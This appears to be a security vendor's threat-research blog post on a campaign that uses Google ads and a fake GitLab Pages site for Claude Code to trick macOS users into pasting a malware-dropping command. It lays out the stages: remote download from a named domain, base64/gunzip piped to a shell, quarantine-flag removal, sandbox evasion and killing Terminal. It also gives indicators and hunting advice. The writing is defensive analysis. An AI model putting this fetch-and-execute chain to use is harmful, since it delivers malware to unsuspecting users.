Three weeks ago, the 7AI Threat Research Team published research on Claude Fraud, a malware campaign targeting developers searching for Claude AI tools. The original campaign used malvertising to drive victims to fake landing pages, then delivered the MacSync infostealer on macOS and a trojanized VS Code extension on Windows.
When the original infrastructure was taken down, we predicted that attackers would adapt. Last Thursday, we saw exactly that, a new type of malvertising campaign using Gitlab, but wrapping the same storyline, a malicious installation method purporting to be Claude Code.
On April 9th, a CrowdStrike detection fired in one of our monitored environments. The alert was MacOSDataObfuscation on a developer workstation. 7AI tracked this back to a user who Googled for "Claude Code" and was promptly misled to a software installation that was very different from how Anthropic would have done it.
What I found when I investigated was concerning, but unfortunately came as no surprise among all the related threats we have been tracking so far this year. It was an attack with the increasingly common pretext we are calling Claude Fraud, now operating with new infrastructure and refined techniques.
The attackers continue to evolve. Instead of hosting their phishing page on compromised infrastructure or Squarespace (as they did in the original campaign), they had moved to GitLab Pages, where anyone can stand up a simple website with no purchase necessary and have a trusted TLS certificate from day one: this time using claude-code-app.gitlab.io.
Both the page’s name and its content impersonated Claude Code, Anthropic's command-line coding tool. The GitLab account behind it used the username of Kieu Trinh, a Vietnamese actress, as a cover identity.
When a victim clicked on a Google ad for "Claude Code" and reached the phishing page, they were routed through a series of Cloudflare Workers URLs with per-victim subdomains. One victim got bland-cache-0953.kieutrinh509372.workers.dev and another got quiet-frame-7261.kieutrinh146085.workers.dev. The attackers were tracking individual victims through their redirect chain while simultaneously ensuring that one report or CloudFlare takedown wouldn’t impact their whole operational infrastructure.
The phishing page used a MacOS-specific form of terminal-based social engineering. It displayed what looked like a Terminal command to install Claude Code. When the victim pasted it, of course, they weren't really installing Claude Code; instead, the command was downloading and executing a multi-stage malware dropper.
Here's what the curl command actually did:
Stage 1: Downloaded an encoded payload from isgilan.com, a domain registered the same day
Deobfuscation: Base64 decoded, gunzipped, and piped to zsh
Stage 2: Downloaded a binary called helper to /tmp/
Gatekeeper bypass: Removed the macOS quarantine flag with xattr -c
Execution: Ran the helper binary, which spawned a bash shell
VM evasion: Launched an obfuscated AppleScript to check if it was running in a sandbox
Anti-forensics: Killed the Terminal process to destroy the session
The AppleScript payload was clever. It used arithmetic obfuscation, building strings character by character at runtime by subtracting arrays of integers. Doing so ensured that there were no helpful static strings to be discovered in the code. The decoded payload checked the system's hardware serial number against known Apple sandbox serials and searched for VMware, VirtualBox, Parallels, and QEMU signatures, thereby avoiding execution if it found itself inside common sandboxing or virtualization tools.
Ironically, CrowdStrike caught and killed the obfuscated AppleScript process in large part because of the anti-sandboxing techniques. This is what triggered our alert.
CrowdStrike's detection was accurate. The kill_process disposition terminated osascript, which prevented the VM evasion check from completing. Because the check failed, the malware's conditional logic interpreted this as "sandbox detected" and aborted the final payload delivery.
But the helper binary itself had already been executed. The pkill Terminal anti-forensics command ran successfully. And the binary, with SHA256 hash ccc77f329745f7fb48605776cf5f51b82301edceaaa9bb273bb8a25e42473d9b, wasn't on VirusTotal.
The block was only partially effective. The malware's own conditional logic is what prevented final payload delivery, not a comprehensive kill chain interruption. If the attackers distributed different variants to different victims, altering or skipping the sandbox check, the attack may have succeeded.
This is why defense in depth and post-compromise investigations still matter. An alert that says "blocked" doesn't tell you what else ran, and doesn’t guarantee that the rest of your environment is safe.
A thorough AI-driven investigation revealed the full scope of the attack. Three hosts in the customer environment had visited the phishing page, not just the one surfaced in the original alert:
With the investigation complete, I moved to disruption.
I reported claude-code-app.gitlab.io to GitLab's abuse team with the full technical details: the attack chain, the payload URLs, the IOCs, and screenshots of the phishing page impersonating Claude Code.
GitLab promptly removed the page. Kudos to the GitLab security team for a fast and effective response!
The attackers' GitLab-based infrastructure is now offline. The payload domain isgilan.com was also reported, but these domains are cheap and disposable. The attackers will register another one tomorrow. The TTPs are what matter.
Phishing Infrastructure
Payload Delivery
Malvertising Chain
File Indicators
Process Chain to Hunt
Terminal → zsh → curl (to isgilan.com) → base64/gunzip/zsh → curl (helper download) → helper → bash -s → osascript + pkill Terminal
Detection Opportunities
The attackers adapt fast. The original Claude Fraud campaign used Anthropic's own artifact infrastructure. When that was taken down, they moved to Squarespace. Now they're on GitLab Pages. They’ll adapt again, so defenders need to be ready.
Per-victim tracking is standard now. The Cloudflare Workers subdomains weren't random. Each victim got a unique URL, which means the attackers can correlate ad clicks to infections. They know which ads are working.
Same-day domain registration is a signal. isgilan.com was registered the same day it was used in an attack. If your DNS telemetry shows connections to domains with registration dates matching the connection date, investigate.
Partial blocks need full investigations. An alert that says "blocked" means something was stopped. It doesn't mean nothing else happened. The helper binary still ran. The anti-forensics command executed. Other users and hosts were impacted by the same campaign. Without the follow-through investigation, you'd never know.
Social engineering is the weak link. Two of three targeted users avoided compromise. One was blocked by a proxy. One simply didn't paste the command. Security awareness training that specifically addresses "paste-jacking" and fake developer tools would have protected the third user too.
If you're running a SOC, here's what to do with this intelligence:
Block the IOC domains at your proxy, DNS, or firewall
Hunt for the process chain in your EDR: curl → base64 → gunzip → shell
Monitor for same-day domain registrations in your DNS telemetry
Brief your users on fake Claude Code pages and the risks of pasting commands from untrusted sources
The campaign is still active. The GitLab page is down, but the Google ads are still running. The attackers will find new hosting. Block, hunt, and stay alert.
This research builds on the original Claude Fraud investigation published by the 7AI Threat Research Team on March 17, 2026. Read the original research: Claude Fraud: When Trusted Tools Become the Attack Surface (https://blog.7ai.com/claude-fraud-malware-campaign-ai-developer-tools)
What is Claude Fraud?
Claude Fraud is an ongoing malware campaign that targets developers searching for Claude AI developer tools. The campaign uses Google Ads malvertising to direct victims to phishing pages that impersonate legitimate Claude products, then uses ClickFix social engineering to trick users into executing malware.
Was the GitLab phishing page taken down?
Yes. After 7AI reported the abuse to GitLab with full technical documentation, GitLab removed the claude-code-app.gitlab.io page. However, the attackers have shown a pattern of quickly standing up replacement infrastructure.
How can I detect this attack in my environment?
Hunt for the process chain: Terminal spawning curl, piped to base64 decode and gunzip, piped to a shell. Also alert on high-entropy Cloudflare domains and curl URLs.
Is this related to the MacSync infostealer?
The original Claude Fraud campaign delivered the MacSync infostealer on macOS. This follow-on attack uses similar TTPs but with a different payload binary. The binary's full capability is unknown because the attack chain was disrupted.